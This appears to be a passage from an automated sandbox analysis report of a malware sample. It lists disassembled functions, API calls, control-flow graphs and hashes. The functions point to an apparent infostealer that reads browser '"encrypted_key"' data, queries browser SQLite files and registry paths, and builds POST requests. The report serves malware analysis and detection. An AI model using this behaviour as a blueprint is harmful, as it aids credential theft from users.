                                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                                      • Opcode ID: 8bc7865d437174b6b785bf315a7221b7f663b87eaefcf9048485de6828ecc9ec
                                                                                                                                                      • Instruction ID: e8faa866ce414427489430d7582fdd4cdbb49fb14b1ba431f313eab5536191cf
                                                                                                                                                      • Opcode Fuzzy Hash: 8bc7865d437174b6b785bf315a7221b7f663b87eaefcf9048485de6828ecc9ec
                                                                                                                                                      • Instruction Fuzzy Hash: 6E7157B0608305AFD750DF64EC84A6BBBE9FB88345F404A2DF995C72A1DB70DD058B52
                                                                                                                                                      Function 00A0B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 667 a0b1e5-a0b20b 668 a0b221-a0b22a 667->668 669 a0b20d-a0b218 call a0aeea 667->669 671 a0b240-a0b243 668->671 672 a0b22c-a0b237 call a0ae65 668->672 677 a0b3ea-a0b3f0 669->677 678 a0b21e 669->678 675 a0b3b9-a0b3d3 671->675 676 a0b249-a0b26b call a0a7ae 671->676 684 a0b3b4-a0b3b7 672->684 685 a0b23d 672->685 679 a0b3db-a0b3df 675->679 687 a0b296-a0b29f 676->687 688 a0b26d-a0b278 676->688 678->668 682 a0b3e1-a0b3e3 679->682 683 a0b3e8 679->683 682->683 690 a0b3e5-a0b3e7 682->690 683->677 684->675 689 a0b3d5-a0b3d8 684->689 685->671 692 a0b2a1 687->692 693 a0b2d6-a0b2ea call a06a5a 687->693 691 a0b27d-a0b291 call a0a1c6 688->691 689->679 690->683 691->684 695 a0b2a3-a0b2a7 692->695 696 a0b2a9-a0b2ad 692->696 702 a0b2f6-a0b2fd 693->702 703 a0b2ec-a0b2f1 693->703 695->693 695->696 696->684 697 a0b2b3-a0b2b9 call a0a67c 696->697 704 a0b2be-a0b2c2 697->704 706 a0b373 702->706 707 a0b2ff-a0b30e 702->707 703->684 704->693 708 a0b2c4-a0b2d4 704->708 709 a0b377-a0b37a 706->709 707->709 708->691 710 a0b310-a0b329 CreateFileMappingW 709->710 711 a0b37c 709->711 712 a0b32b-a0b357 MapViewOfFile 710->712 713 a0b37e-a0b3ab call a0a1c6 710->713 711->684 712->713 714 a0b359-a0b370 712->714 713->684 718 a0b3ad 713->718 714->706 718->684
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00A0B31D
                                                                                                                                                      • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00A0B34F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CreateMappingView
                                                                                                                                                      • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                      • API String ID: 3452162329-3826999013
                                                                                                                                                      • Opcode ID: 87652dbd57f99ccea0693d4df64e64bd91cc8c9345ee272bd14f19782abed2c6
                                                                                                                                                      • Instruction ID: c475e55d612608634c38aad2b0e174ab2d7c269a3b48d7386f1b9ed43a0023ef
                                                                                                                                                      • Opcode Fuzzy Hash: 87652dbd57f99ccea0693d4df64e64bd91cc8c9345ee272bd14f19782abed2c6
                                                                                                                                                      • Instruction Fuzzy Hash: 4D51B171214709DFD725CF54EA81A6A77F5FB98304F24882DE9428B6D1DB70E805CB62
                                                                                                                                                      Function 00A0A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 719 a0a40e-a0a424 720 a0a4a2-a0a4aa 719->720 721 a0a426-a0a42a 719->721 722 a0a4ae-a0a4c8 720->722 723 a0a431-a0a441 721->723 724 a0a42c-a0a42f 721->724 727 a0a4cc-a0a4e3 ReadFile 722->727 725 a0a443 723->725 726 a0a469-a0a4a0 memcpy 723->726 724->720 724->723 728 a0a445-a0a448 725->728 729 a0a44a-a0a45a memcpy 725->729 726->722 730 a0a524-a0a538 call a0a2aa 727->730 731 a0a4e5-a0a4ee 727->731 728->726 728->729 732 a0a45d 729->732 730->732 737 a0a53e-a0a553 memset 730->737 731->730 738 a0a4f0-a0a4ff call a0a250 731->738 734 a0a45f-a0a466 732->734 737->734 738->727 741 a0a501-a0a51f call a0a1c6 738->741 741->734
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$FileReadmemset
                                                                                                                                                      • String ID: winRead
                                                                                                                                                      • API String ID: 2051157613-2759563040
                                                                                                                                                      • Opcode ID: 888438a52be17124c5a5460ae247f02d8bf01454605d6c93ac54a465614d27a1
                                                                                                                                                      • Instruction ID: 33a929e863e54aa8ce093acbfb0d05f31c1c2c07e8d286a968a2e6aa777d613c
                                                                                                                                                      • Opcode Fuzzy Hash: 888438a52be17124c5a5460ae247f02d8bf01454605d6c93ac54a465614d27a1
                                                                                                                                                      • Instruction Fuzzy Hash: 5631AB76608308ABC740DF68ED8589F77A6FFD8310F845928F88587291E2B1EC048B93
                                                                                                                                                      Function 00A02E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 744 a02e30-a02e55 StrStrIW 745 a02e57-a02e6c call a019e5 744->745 746 a02ebe-a02eec call a01000 RegOpenKeyExW 744->746 751 a02ebc 745->751 752 a02e6e-a02e79 call a01bc5 745->752 753 a02f68-a02f74 call a01011 746->753 754 a02eee-a02efd 746->754 751->746 762 a02eb5-a02eb7 call a01011 752->762 763 a02e7b-a02e85 call a01afe 752->763 756 a02f50-a02f5c RegEnumKeyExW 754->756 759 a02f5e-a02f62 RegCloseKey 756->759 760 a02eff-a02f26 call a01953 call a0199d call a02e30 756->760 759->753 777 a02f2b-a02f4f call a01011 760->777 762->751 770 a02e87-a02e97 call a0199d 763->770 771 a02eae-a02eb0 call a01011 763->771 770->771 778 a02e99-a02e9f 770->778 771->762 777->756 778->771 780 a02ea0 call a02c77 778->780 780->771
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIW.KERNELBASE(?,?), ref: 00A02E4B
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00A02EE4
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00A02F54
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00A02F62
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                        • Part of subcall function 00A01BC5: lstrlenW.KERNEL32(00000000,00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BCC
                                                                                                                                                        • Part of subcall function 00A01BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BF0
                                                                                                                                                        • Part of subcall function 00A01BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C05
                                                                                                                                                        • Part of subcall function 00A01BC5: lstrlenW.KERNEL32(00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C1C
                                                                                                                                                        • Part of subcall function 00A01AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00A02E83,PathToExe,00000000,00000000), ref: 00A01B16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                      • String ID: PathToExe
                                                                                                                                                      • API String ID: 1799103994-1982016430
                                                                                                                                                      • Opcode ID: 9bfd8c4c986454d49b1184ab4ef3f93269f81d8aa576bbbefd75fbf088edf019
                                                                                                                                                      • Instruction ID: 1b7dfe2254bcd36991e634282a51a68a8a9dbf57a8093a3dd9e0cec7722f5ca9
                                                                                                                                                      • Opcode Fuzzy Hash: 9bfd8c4c986454d49b1184ab4ef3f93269f81d8aa576bbbefd75fbf088edf019
                                                                                                                                                      • Instruction Fuzzy Hash: A4318D316043196FCB15AF21DC19DAF7AA9EFC4390B04851CF855872C0EA34C906CBA1
                                                                                                                                                      Function 00A0A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 782 a0a67c-a0a692 783 a0a6c1-a0a6c4 782->783 784 a0a694-a0a6bf _alldiv _allmul 782->784 785 a0a6c7-a0a6d2 call a0a33b 783->785 784->785 788 a0a6f0-a0a6fb SetEndOfFile 785->788 789 a0a6d4-a0a6df 785->789 791 a0a6fd-a0a708 788->791 792 a0a71e 788->792 790 a0a6e4-a0a6ee call a0a1c6 789->790 793 a0a722-a0a726 790->793 791->792 799 a0a70a-a0a71c 791->799 792->793 796 a0a728-a0a72b 793->796 797 a0a73a-a0a740 793->797 796->797 800 a0a72d 796->800 799->790 801 a0a734-a0a737 800->801 802 a0a72f-a0a732 800->802 801->797 802->797 802->801
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File_alldiv_allmul
                                                                                                                                                      • String ID: winTruncate1$winTruncate2
                                                                                                                                                      • API String ID: 3568847005-470713972
                                                                                                                                                      • Opcode ID: 31d8324b20ce979de52dbaf87632bff61ff2c1be19579de754b42ab5d6720b47
                                                                                                                                                      • Instruction ID: 6d83d83f0ad4bef23306b498a698adb644772305cb29fc8c599e6dc847649278
                                                                                                                                                      • Opcode Fuzzy Hash: 31d8324b20ce979de52dbaf87632bff61ff2c1be19579de754b42ab5d6720b47
                                                                                                                                                      • Instruction Fuzzy Hash: FE21AC72201208ABCB148F69EC85E6B77B9EFA4351F158169FD04DB296D635DC10CBA2
                                                                                                                                                      Function 00A04A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • wsprintfW.USER32 ref: 00A04AA2
                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00A04AC7
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00A04AD4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                                      • String ID: %s\%08x$Software
                                                                                                                                                      • API String ID: 1800864259-1658101971
                                                                                                                                                      • Opcode ID: d78e2e91bb801477414adb55226324064dc6754e92f97ec0b565775d13dd6172
                                                                                                                                                      • Instruction ID: 5622d6b509c97b47cb2906755578254881f95cbcc7e5a48a0161fad9db7b3ede
                                                                                                                                                      • Opcode Fuzzy Hash: d78e2e91bb801477414adb55226324064dc6754e92f97ec0b565775d13dd6172
                                                                                                                                                      • Instruction Fuzzy Hash: C601D471600108BFDB18DF95EC4ADBF77ADFB44355B80016EF90593181EAB05D459660
                                                                                                                                                      Function 00A04317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _alloca_probe.NTDLL ref: 00A0431C
                                                                                                                                                      • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00A04335
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A04363
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A043C8
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                        • Part of subcall function 00A0418A: wsprintfW.USER32 ref: 00A04212
                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A043B9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 801677237-0
                                                                                                                                                      • Opcode ID: b53563cf9bcc6de3c1b8d0c9c55e59b67c9298f3608a3fb9a7b85f7f24189c33
                                                                                                                                                      • Instruction ID: 1a49f54a299a899a1f65901da56bb8a56e7807a69e1576353acbd26a09c90592
                                                                                                                                                      • Opcode Fuzzy Hash: b53563cf9bcc6de3c1b8d0c9c55e59b67c9298f3608a3fb9a7b85f7f24189c33
                                                                                                                                                      • Instruction Fuzzy Hash: CC1160B1108205AFE715DB60DC45DBB77EDFB88344F00862EF98AD2190EA749D499A62
                                                                                                                                                      Function 00A0B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • memset.NTDLL ref: 00A0B8D5
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00A0B96F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFilememset
                                                                                                                                                      • String ID: psow$winOpen
                                                                                                                                                      • API String ID: 2416746761-4101858489
                                                                                                                                                      • Opcode ID: 5aed4c0ee315a9bc9d49ffddcaeeb1e8ef77c976103411485eb0bd442dc992dc
                                                                                                                                                      • Instruction ID: 4ab951f9764f86fd96ea1521bc19bc628944bb03db5352206e20324ccd962505
                                                                                                                                                      • Opcode Fuzzy Hash: 5aed4c0ee315a9bc9d49ffddcaeeb1e8ef77c976103411485eb0bd442dc992dc
                                                                                                                                                      • Instruction Fuzzy Hash: 7F71B071A1470AAFC710DF28EA8175ABBE0FF88364F044A2DF864972D1D774D954CBA2
                                                                                                                                                      Function 00A69247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A67000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a67000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 515bebe60562db4dcd0703d0a3bb9dda89070127c46a1a7e164594820aca3941
                                                                                                                                                      • Instruction ID: 93c8fbf465618fae31bbb97f63a101eb8c3791201f3972375bbcb14b37d5774d
                                                                                                                                                      • Opcode Fuzzy Hash: 515bebe60562db4dcd0703d0a3bb9dda89070127c46a1a7e164594820aca3941
                                                                                                                                                      • Instruction Fuzzy Hash: 08A12B729547525BD7218F78DCC46A27BB9EB52324B2C066DC5E2CB2C2EB70980BC751
                                                                                                                                                      Function 00A019E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 217796345-0
                                                                                                                                                      • Opcode ID: 57a2042ee8923ce86ce951153c17c19e8470f408962218542693ca3b6455f143
                                                                                                                                                      • Instruction ID: e153ded347852aa7985c2b836e66328b7ab74e9ed2d2baee30e8f271b2289242
                                                                                                                                                      • Opcode Fuzzy Hash: 57a2042ee8923ce86ce951153c17c19e8470f408962218542693ca3b6455f143
                                                                                                                                                      • Instruction Fuzzy Hash: E921E5723063496FE7248B21ED44FBBB7E8EBC8799F004A2DF98692180E630CD418721
                                                                                                                                                      Function 00A01EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00A01ED5
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A01F0C
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A01F98
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                        • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                        • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A01F82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1077800024-0
                                                                                                                                                      • Opcode ID: c1e5d401aabca21f249af40f4a796440f2c215a10b6ba0fa90271779b1e2213a
                                                                                                                                                      • Instruction ID: 81043ba25a73ec849a549ab3386b43d32a2057e8d40e3f20c90975539e7236ce
                                                                                                                                                      • Opcode Fuzzy Hash: c1e5d401aabca21f249af40f4a796440f2c215a10b6ba0fa90271779b1e2213a
                                                                                                                                                      • Instruction Fuzzy Hash: B9218E712083056FD7059B61EC48D7FBBEDFF88354F40892DF89A92190DB35C9059B22
                                                                                                                                                      Function 00A01C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00A03E1E,00000000,?,00A03FA8), ref: 00A01C46
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00A03FA8), ref: 00A01C56
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00A03FA8), ref: 00A01C91
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00A03FA8), ref: 00A01C76
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2517252058-0
                                                                                                                                                      • Opcode ID: 907a1d2481d2f6cf476f0b4d79c91ebcb67334da875d979b40ea0fe06c8baf7b
                                                                                                                                                      • Instruction ID: 8ea8a2bc0c58d34348ab5e749ca40c85c5810d545845664c84631c67bd9d108a
                                                                                                                                                      • Opcode Fuzzy Hash: 907a1d2481d2f6cf476f0b4d79c91ebcb67334da875d979b40ea0fe06c8baf7b
                                                                                                                                                      • Instruction Fuzzy Hash: 04F0A43120031C7BD2245B66EC8CEBB7A5CEB467F6F150719F516931D0EB229C464171
                                                                                                                                                      Function 00A02FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00A03E30,00000000,00000000,?,00A03FA8), ref: 00A02FC1
                                                                                                                                                      • lstrlen.KERNEL32("encrypted_key":",?,00A03FA8), ref: 00A02FCE
                                                                                                                                                      • StrStrIA.SHLWAPI("encrypted_key":",00A5692C,?,00A03FA8), ref: 00A02FDD
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,?), ref: 00A01946
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                      • String ID: "encrypted_key":"
                                                                                                                                                      • API String ID: 493641738-877455259
                                                                                                                                                      • Opcode ID: 4894cd00102f3ed3b579e8755f4c423415d1db4167bb3c3fadd811ff5cf03ff8
                                                                                                                                                      • Instruction ID: ccfa1dde580633a3826f7c15415f565297806d0c828bacd2db37c7bbccc84f6e
                                                                                                                                                      • Opcode Fuzzy Hash: 4894cd00102f3ed3b579e8755f4c423415d1db4167bb3c3fadd811ff5cf03ff8
                                                                                                                                                      • Instruction Fuzzy Hash: EBE06122705B295FC3A1ABF53C489973F2CBE023923440174F601D3153DE518816C3E0
                                                                                                                                                      Function 00A0BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00A0BB40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID: winDelete
                                                                                                                                                      • API String ID: 3188754299-3936022152
                                                                                                                                                      • Opcode ID: d83bb9a5ab243ada30cdadc256195c7fef126cb0861ace13bb7f127b9ece3ffd
                                                                                                                                                      • Instruction ID: 4ec2d6ec63b36e2499a2d336939770318343f10ce327fa7e8719e8b6306004d1
                                                                                                                                                      • Opcode Fuzzy Hash: d83bb9a5ab243ada30cdadc256195c7fef126cb0861ace13bb7f127b9ece3ffd
                                                                                                                                                      • Instruction Fuzzy Hash: 0B110831A1020CEBC710EBB8AA8187D7775EFA2760F144125F801D72D4DB308D02D762
                                                                                                                                                      Function 00A02EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
